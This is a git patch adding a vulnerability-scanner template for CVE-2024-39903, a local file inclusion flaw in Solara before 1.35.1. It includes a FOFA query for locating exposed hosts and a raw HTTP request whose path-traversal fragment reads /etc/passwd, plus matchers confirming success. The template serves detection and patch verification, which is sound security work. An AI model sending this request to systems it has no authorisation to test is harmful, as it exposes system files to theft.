From 596de406d87b7bd1323355627e91fa2888b0d17a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Jul 2024 15:09:32 +0530 Subject: [PATCH] Create CVE-2024-39903.yaml --- http/cves/2024/CVE-2024-39903.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-39903.yaml diff --git a/http/cves/2024/CVE-2024-39903.yaml b/http/cves/2024/CVE-2024-39903.yaml new file mode 100644 index 0000000000..439cd7cf71 --- /dev/null +++ b/http/cves/2024/CVE-2024-39903.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-39903 + +info: + name: Solara <1.35.1 - Local File Inclusion + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-39903 + - https://github.com/widgetti/solara/commit/df2fd66a7f4e8ffd36e8678697a8a4f76760dc54 + - https://github.com/widgetti/solara/security/advisories/GHSA-9794-pc4r-438w + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-39903 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.109 + metadata: + fofa-query: icon_hash="-223126228" + verified: true + max-request: 1 + tags: cve,cve2024,solara,lfi + +http: + - raw: + - |+ + GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: regex + part: content_type + regex: + - "text/plain" + + - type: status + status: + - 200